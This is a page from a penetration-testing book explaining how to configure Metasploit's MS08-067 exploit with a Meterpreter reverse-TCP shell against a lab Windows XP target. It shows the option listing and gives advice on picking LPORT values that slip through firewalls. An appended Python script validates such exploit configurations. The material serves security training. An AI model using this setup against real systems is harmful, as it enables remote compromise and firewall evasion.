
The Joy of Exploitation

67

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.33.130   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.33.129   yes       The local address
   LPORT     8080             yes       The local port

Exploit target:

   Id  Name
   --  ----
   3   Windows XP SP2 English (NX)

We search for the MS08-067 NetAPI exploit in the Framework at  . Then, having found our exploit, we load the windows/smb/ms08_067_netapi exploit at  . Next, at   we set the payload as the Windows-based Meterpreter reverse_tcp which, if successful, will start a connection on the target machine and connect back to the attacking machine specified with LHOST. This is important if you find that a firewall is in place and you need to bypass incoming controls on a firewall or NAT.

Meterpreter is a post-exploitation tool that we'll use throughout this book. One of Metasploit's flagship tools, it makes extracting information or further compromising systems significantly easier.

The show targets command at   allows us to identify the system we want to target. (Although many MSF exploits use automatic targeting and don't require this flag, autodetection generally fails for MS08-067.) We then set our target to Windows XP SP2 English (NX) at  . The NX stands for No Execute. By default in Windows XP SP2, DEP is enabled.

At   we set the RHOST value, the IP address of the target machine that is vulnerable to the MS08-067 exploit.

The set LHOST command at   specifies our attacking machine's IP address (the Back|Track machine), and the LPORT option at   specifies the port on which our attacker machine will listen for a connection from our target. (When you're setting the LPORT option, use a standard port that you think will be allowed through the firewall: ports 443, 80, 53, and 8080 are often good options.) Finally, we enter show options at   to make sure that the options are set up correctly.
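As an added example (not from the book), here is a small Python checker for a show options dump like the one above: it parses the option tables, reports required options that are still unset, and flags an LPORT outside the firewall-friendly ports the text recommends. The listing embedded in it is copied from this page as a constructed sample.

```python
import re
# Constructed sample: the 'show options' listing from this page.
SHOW_OPTIONS = """\
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.33.130   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.33.129   yes       The local address
   LPORT     8080             yes       The local port
"""
# Ports the text recommends for LPORT because egress filters usually allow them.
FIREWALL_FRIENDLY_PORTS = {443, 80, 53, 8080}
SECTION_RE = re.compile(r"^(Module options|Payload options)(?: \((?P<payload>[^)]+)\))?:")
# name, setting (possibly empty), required yes/no, description; 'Name' and '----' rows never match.
OPTION_RE = re.compile(r"^\s*(?P<name>\S+)\s+(?P<setting>.*?)\s+(?P<required>yes|no)\s+.*$", re.I)


def parse_show_options(text):
    """Return ({option: {setting, required, section}}, payload_name)."""
    options, payload, section = {}, None, None
    for line in text.splitlines():
        head = SECTION_RE.match(line)
        if head:
            section = head.group(1)
            payload = head.group("payload") or payload
            continue
        row = OPTION_RE.match(line) if section else None
        if row:
            options[row["name"]] = {"setting": row["setting"].strip(),
                                    "required": row["required"].lower() == "yes",
                                    "section": section}
    return options, payload

def missing_required(options):
    """Required options still empty; msfconsole refuses to run until they are set."""
    return sorted(n for n, o in options.items() if o["required"] and not o["setting"])

def check_config(text):
    """Sanity checks from the text: every required option set, LPORT firewall-friendly."""
    options, payload = parse_show_options(text)
    findings = [f"required option {n} is not set" for n in missing_required(options)]
    lport = options.get("LPORT", {}).get("setting")
    if payload and "reverse" in payload and lport and int(lport) not in FIREWALL_FRIENDLY_PORTS:
        findings.append(f"LPORT {lport} is not a commonly allowed egress port")
    return findings
```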